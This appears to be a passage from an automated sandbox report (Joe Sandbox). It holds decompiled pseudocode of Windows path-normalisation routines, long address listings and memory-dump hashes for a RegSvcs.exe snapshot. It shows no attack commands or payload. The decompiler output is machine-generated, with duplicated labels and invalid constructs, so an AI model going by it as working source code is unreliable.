																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L01374658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E01329BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E012F52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L012F83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E012F52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L012F83AE(_t428);
														L80:
														E01329BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x12d1080;
														_v72 =  *0x12d1080;
														__eax =  *0x12d1084;
														_v68 =  *0x12d1084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E01329BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E0131746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E0133B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

































































































                                          0x01316e30
                                          0x01316e35
                                          0x01316e37
                                          0x01316e3c
                                          0x01316e47
                                          0x01316e4b
                                          0x01316e50
                                          0x01316e53
                                          0x01316e55
                                          0x01316e5b
                                          0x01316e5f
                                          0x01316e65
                                          0x01316e68
                                          0x01316e6a
                                          0x01316e6d
                                          0x01316e70
                                          0x01316e73
                                          0x01316e76
                                          0x01316e79
                                          0x01316e7c
                                          0x01316e7f
                                          0x01316e84
                                          0x0131710f
                                          0x0131710f
                                          0x01316e8c
                                          0x01316e8e
                                          0x01316e8e
                                          0x01316e97
                                          0x0135f5d3
                                          0x0135f5d3
                                          0x01316e9d
                                          0x01316ea3
                                          0x01316eaa
                                          0x01316ead
                                          0x01316eb2
                                          0x01316eb4
                                          0x01316eb7
                                          0x01317466
                                          0x01317466
                                          0x00000000
                                          0x01316ebd
                                          0x01316ebd
                                          0x01316ec4
                                          0x01316eca
                                          0x01316ecc
                                          0x01316ecf
                                          0x01316ed2
                                          0x01316ede
                                          0x0135f5df
                                          0x0135f5e0
                                          0x00000000
                                          0x0135f5e0
                                          0x01316ee6
                                          0x00000000
                                          0x00000000
                                          0x01316eec
                                          0x01316ef3
                                          0x01317181
                                          0x01316f02
                                          0x01316f02
                                          0x01316f02
                                          0x01316f0b
                                          0x01316f0d
                                          0x01316f10
                                          0x01316f17
                                          0x01316f21
                                          0x01316f24
                                          0x01316f2d
                                          0x01316f31
                                          0x01316f36
                                          0x01316f3d
                                          0x01317413
                                          0x01317416
                                          0x01317419
                                          0x0131741c
                                          0x01317421
                                          0x0131742b
                                          0x0131742b
                                          0x0131742e
                                          0x01317439
                                          0x0135f60b
                                          0x0135f60b
                                          0x0135f615
                                          0x0135f619
                                          0x0131743f
                                          0x01317447
                                          0x01317454
                                          0x0131745a
                                          0x0131745f
                                          0x0131745f
                                          0x00000000
                                          0x01317439
                                          0x01317425
                                          0x0135f5e9
                                          0x0135f5ed
                                          0x0135f5f4
                                          0x00000000
                                          0x00000000
                                          0x0135f5fd
                                          0x00000000
                                          0x00000000
                                          0x0135f603
                                          0x0135f603
                                          0x00000000
                                          0x01316f43
                                          0x01316f43
                                          0x01316f45
                                          0x01316f48
                                          0x01316f4e
                                          0x01316f65
                                          0x01316f68
                                          0x0131721f
                                          0x01316f83
                                          0x01316f86
                                          0x013172dc
                                          0x013172dc
                                          0x01316f9e
                                          0x01316fa1
                                          0x01316fa3
                                          0x01316fa5
                                          0x01316fa8
                                          0x01316fab
                                          0x01316fae
                                          0x01316fb1
                                          0x01316fb4
                                          0x01316fb6
                                          0x01316fb9
                                          0x01316fbf
                                          0x0131718a
                                          0x0131718e
                                          0x0135f831
                                          0x0135f831
                                          0x0135f833
                                          0x0135f836
                                          0x00000000
                                          0x0135f836
                                          0x01317194
                                          0x00000000
                                          0x0135f658
                                          0x0135f658
                                          0x0135f65a
                                          0x0135f65d
                                          0x0135f662
                                          0x0135f662
                                          0x0135f665
                                          0x0135f667
                                          0x00000000
                                          0x00000000
                                          0x0135f669
                                          0x0135f66c
                                          0x0135f670
                                          0x0135f673
                                          0x0135f67a
                                          0x0135f67a
                                          0x0135f67b
                                          0x0135f67e
                                          0x0135f681
                                          0x00000000
                                          0x00000000
                                          0x0135f683
                                          0x0135f683
                                          0x00000000
                                          0x0135f683
                                          0x0135f675
                                          0x0135f678
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0135f678
                                          0x0135f686
                                          0x0135f688
                                          0x0135f68b
                                          0x0135f68e
                                          0x0135f691
                                          0x0135f694
                                          0x0135f698
                                          0x0135f69c
                                          0x0135f6a0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01317397
                                          0x0131739c
                                          0x0131739f
                                          0x013173a3
                                          0x013173a5
                                          0x0135f6bb
                                          0x0135f6c1
                                          0x0135f6c4
                                          0x013173ab
                                          0x013173ab
                                          0x013173ab
                                          0x013173b1
                                          0x013173b5
                                          0x013173ba
                                          0x013173c0
                                          0x013173c3
                                          0x013173c7
                                          0x013173cc
                                          0x013173d0
                                          0x013173d3
                                          0x0135f6cc
                                          0x0135f6d4
                                          0x0135f6d9
                                          0x0135f6dd
                                          0x0135f6e1
                                          0x0135f6e5
                                          0x0135f6f0
                                          0x0135f6fc
                                          0x0135f700
                                          0x0135f709
                                          0x0135f70e
                                          0x0135f710
                                          0x0135f784
                                          0x0135f788
                                          0x0135f78b
                                          0x0135f78e
                                          0x0135f790
                                          0x0135f792
                                          0x0135f795
                                          0x0135f798
                                          0x0135f7b7
                                          0x0135f7b7
                                          0x0135f7ba
                                          0x0135f7ba
                                          0x00000000
                                          0x0135f7ba
                                          0x0135f79a
                                          0x0135f79d
                                          0x00000000
                                          0x00000000
                                          0x0135f79f
                                          0x0135f7a4
                                          0x0135f7a7
                                          0x0135f7ab
                                          0x0135f7ae
                                          0x0135f7b1
                                          0x00000000
                                          0x0135f7b1
                                          0x0135f712
                                          0x0135f717
                                          0x0135f74c
                                          0x0135f74e
                                          0x0135f752
                                          0x0135f756
                                          0x0135f75d
                                          0x0135f761
                                          0x0135f764
                                          0x0135f76c
                                          0x0135f771
                                          0x0135f775
                                          0x0135f778
                                          0x0135f77c
                                          0x00000000
                                          0x0135f77c
                                          0x0135f719
                                          0x0135f71d
                                          0x0135f720
                                          0x0135f723
                                          0x0135f726
                                          0x0135f729
                                          0x0135f72e
                                          0x0135f740
                                          0x0135f744
                                          0x00000000
                                          0x0135f744
                                          0x0135f730
                                          0x0135f732
                                          0x0135f735
                                          0x0135f738
                                          0x00000000
                                          0x013173d9
                                          0x013173d9
                                          0x013173db
                                          0x013173de
                                          0x013173e1
                                          0x013173e4
                                          0x013173e7
                                          0x013173ea
                                          0x013173ef
                                          0x013173f2
                                          0x013173f6
                                          0x013173f9
                                          0x013173f9
                                          0x013173fe
                                          0x01317401
                                          0x01317406
                                          0x01317409
                                          0x00000000
                                          0x01317409
                                          0x00000000
                                          0x0135f7c5
                                          0x0135f7ca
                                          0x0135f7cd
                                          0x0135f7d1
                                          0x0135f7d3
                                          0x0135f7da
                                          0x0135f7e0
                                          0x0135f7e3
                                          0x0135f7e3
                                          0x0135f7e6
                                          0x0135f7d5
                                          0x0135f7d5
                                          0x0135f7d5
                                          0x0135f7e9
                                          0x0135f7eb
                                          0x0135f7f0
                                          0x0135f7f3
                                          0x0135f7f5
                                          0x0135f7f8
                                          0x0135f7fb
                                          0x0135f7fe
                                          0x0135f801
                                          0x0135f80f
                                          0x0135f814
                                          0x0135f803
                                          0x0135f803
                                          0x0135f806
                                          0x0135f806
                                          0x00000000
                                          0x00000000
                                          0x0131719d
                                          0x013171a2
                                          0x013171a5
                                          0x013171a9
                                          0x013171ab
                                          0x0135f826
                                          0x0135f829
                                          0x013171b1
                                          0x013171b1
                                          0x013171ba
                                          0x013171ba
                                          0x013171bf
                                          0x013171c5
                                          0x013171cf
                                          0x013171d2
                                          0x013171d8
                                          0x013171dd
                                          0x013171e4
                                          0x013171e7
                                          0x00000000
                                          0x00000000
                                          0x01317275
                                          0x0131727a
                                          0x0131727d
                                          0x0131727f
                                          0x01317282
                                          0x01317284
                                          0x0135f6a8
                                          0x0135f6aa
                                          0x0135f6aa
                                          0x0131728a
                                          0x0131728f
                                          0x01317292
                                          0x01317297
                                          0x0131729a
                                          0x0131729d
                                          0x013172a0
                                          0x013172a5
                                          0x013172a9
                                          0x013172ac
                                          0x013172af
                                          0x013172b2
                                          0x013172b5
                                          0x013172b7
                                          0x013172ba
                                          0x013172be
                                          0x013172be
                                          0x013172c2
                                          0x013172c5
                                          0x013172c8
                                          0x0135f6b2
                                          0x0135f6b2
                                          0x00000000
                                          0x00000000
                                          0x01316fc5
                                          0x01316fc5
                                          0x01316fcc
                                          0x01316fd8
                                          0x01316fda
                                          0x01316fdd
                                          0x01316fe3
                                          0x01317162
                                          0x0135f845
                                          0x00000000
                                          0x00000000
                                          0x0135f84e
                                          0x0135f8c4
                                          0x0135f8c8
                                          0x0135f8cb
                                          0x0135f8ce
                                          0x013170e0
                                          0x013170e0
                                          0x013170e3
                                          0x013170e3
                                          0x013170ea
                                          0x013170ef
                                          0x013170f1
                                          0x013170f4
                                          0x013170fc
                                          0x013170fd
                                          0x013170fe
                                          0x0131710c
                                          0x0131710c
                                          0x0135f850
                                          0x0135f858
                                          0x0135f87a
                                          0x0135f88a
                                          0x0135f88d
                                          0x0135f890
                                          0x0135f893
                                          0x0135f895
                                          0x0135f898
                                          0x0135f8a4
                                          0x0135f8ad
                                          0x0135f8b0
                                          0x0135f8b3
                                          0x0135f8b3
                                          0x0135f8a4
                                          0x01316fec
                                          0x01316fec
                                          0x01316fee
                                          0x00000000
                                          0x01316ff1
                                          0x01316ff8
                                          0x00000000
                                          0x01316ffe
                                          0x01317004
                                          0x01317006
                                          0x01317006
                                          0x01317010
                                          0x01317017
                                          0x0131701e
                                          0x01317072
                                          0x01317074
                                          0x0131707e
                                          0x01317083
                                          0x01317087
                                          0x01317088
                                          0x0131706c
                                          0x0131706c
                                          0x0131706d
                                          0x00000000
                                          0x0131706d
                                          0x0131707c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131707c
                                          0x01317020
                                          0x01317023
                                          0x013171ef
                                          0x013171ef
                                          0x013171f2
                                          0x013171f7
                                          0x00000000
                                          0x00000000
                                          0x013171fd
                                          0x01317200
                                          0x01317205
                                          0x0131720b
                                          0x0131720e
                                          0x013172eb
                                          0x00000000
                                          0x00000000
                                          0x013172f6
                                          0x00000000
                                          0x01317030
                                          0x01317037
                                          0x0131703e
                                          0x01317055
                                          0x0131705a
                                          0x01317062
                                          0x0135f908
                                          0x0135f90e
                                          0x0135f90f
                                          0x0135f90f
                                          0x0135f908
                                          0x01317062
                                          0x0131705a
                                          0x00000000
                                          0x01317045
                                          0x01317045
                                          0x01317049
                                          0x0131704a
                                          0x0131704d
                                          0x0131704e
                                          0x00000000
                                          0x0131704e
                                          0x0131703e
                                          0x01317068
                                          0x01317069
                                          0x00000000
                                          0x01317069
                                          0x013172fc
                                          0x01317301
                                          0x01317304
                                          0x01317314
                                          0x01317314
                                          0x01317319
                                          0x00000000
                                          0x00000000
                                          0x01317325
                                          0x0131732d
                                          0x01317330
                                          0x01317356
                                          0x01317357
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01317332
                                          0x01317332
                                          0x01317337
                                          0x00000000
                                          0x00000000
                                          0x01317343
                                          0x0131734b
                                          0x0131734e
                                          0x01317361
                                          0x00000000
                                          0x00000000
                                          0x01317367
                                          0x01317367
                                          0x01317368
                                          0x00000000
                                          0x01317368
                                          0x01317350
                                          0x01317351
                                          0x01317351
                                          0x00000000
                                          0x01317332
                                          0x0135f8f9
                                          0x0135f8f9
                                          0x0135f8fa
                                          0x00000000
                                          0x0135f8fa
                                          0x01317306
                                          0x0131730e
                                          0x0135f8ee
                                          0x00000000
                                          0x00000000
                                          0x0135f8f4
                                          0x00000000
                                          0x0131730e
                                          0x01317214
                                          0x01317214
                                          0x01317217
                                          0x00000000
                                          0x01317217
                                          0x0131702c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131702c
                                          0x0131708d
                                          0x01317094
                                          0x01317098
                                          0x013170a0
                                          0x0131738c
                                          0x0131738d
                                          0x0131738d
                                          0x013170a0
                                          0x01317098
                                          0x013170a6
                                          0x013170ab
                                          0x013170b3
                                          0x013170b5
                                          0x013170cd
                                          0x013170cd
                                          0x013170d0
                                          0x013170d8
                                          0x0131711a
                                          0x0131711c
                                          0x0131711c
                                          0x01317121
                                          0x00000000
                                          0x00000000
                                          0x01317129
                                          0x00000000
                                          0x00000000
                                          0x0131712b
                                          0x0131712b
                                          0x01317130
                                          0x0131737e
                                          0x01317381
                                          0x00000000
                                          0x01317381
                                          0x01317138
                                          0x00000000
                                          0x00000000
                                          0x01317144
                                          0x01317144
                                          0x013170da
                                          0x013170da
                                          0x013170dd
                                          0x00000000
                                          0x013170dd
                                          0x013170b7
                                          0x013170b8
                                          0x013170bb
                                          0x013170c2
                                          0x00000000
                                          0x00000000
                                          0x013170c7
                                          0x00000000
                                          0x00000000
                                          0x013170c9
                                          0x013170ca
                                          0x00000000
                                          0x013170ad
                                          0x013170ad
                                          0x013170af
                                          0x00000000
                                          0x013170af
                                          0x01317148
                                          0x0131714d
                                          0x0135f8e2
                                          0x0135f8e2
                                          0x01317153
                                          0x01317154
                                          0x01317157
                                          0x00000000
                                          0x01317157
                                          0x0135f87c
                                          0x0135f87f
                                          0x0135f882
                                          0x00000000
                                          0x0135f882
                                          0x0135f85e
                                          0x00000000
                                          0x00000000
                                          0x0135f864
                                          0x0135f869
                                          0x0135f86c
                                          0x00000000
                                          0x0135f86c
                                          0x01317168
                                          0x01317170
                                          0x0135f8d6
                                          0x0135f8d6
                                          0x01317176
                                          0x01317179
                                          0x00000000
                                          0x01317179
                                          0x01316fe9
                                          0x01316fe9
                                          0x00000000
                                          0x01316fe9
                                          0x01316fbf
                                          0x01316f8c
                                          0x01316f93
                                          0x013172d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013172d6
                                          0x01316f99
                                          0x01316f99
                                          0x01316f99
                                          0x00000000
                                          0x01316f68
                                          0x01316f50
                                          0x01316f56
                                          0x0131722c
                                          0x0135f629
                                          0x0135f629
                                          0x00000000
                                          0x0135f629
                                          0x01317232
                                          0x01317239
                                          0x0135f623
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0135f623
                                          0x0131723f
                                          0x01317242
                                          0x0135f64e
                                          0x0135f64e
                                          0x00000000
                                          0x0135f64e
                                          0x01317248
                                          0x0131724f
                                          0x01317373
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01317379
                                          0x01317255
                                          0x01317258
                                          0x0135f63c
                                          0x0135f648
                                          0x00000000
                                          0x0135f648
                                          0x0131725e
                                          0x01317265
                                          0x0135f636
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0135f636
                                          0x0131726b
                                          0x0131726b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01316f56
                                          0x01316f3d
                                          0x01316ed2
                                          0x00000000
                                          0x01316ec4

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56212b7b9515d4dd8d7bb8edc2926ecf2abdb6e71ae8bc17f613eb81b8bc0960
                                          • Instruction ID: 76124240f2b0f7a9f1b2e19b3b0f4bd1dc5aa91a7a2bf3eb0abef6d41eb2aab6
                                          • Opcode Fuzzy Hash: 56212b7b9515d4dd8d7bb8edc2926ecf2abdb6e71ae8bc17f613eb81b8bc0960
                                          • Instruction Fuzzy Hash: A902B275D10219CBCB2CCF9CC480AADBBB5FF44708F69402EE915EB659E7709882CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01314120 Relevance: .4, Instructions: 444COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E01314120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x13ed360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0132F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01316E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01314620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
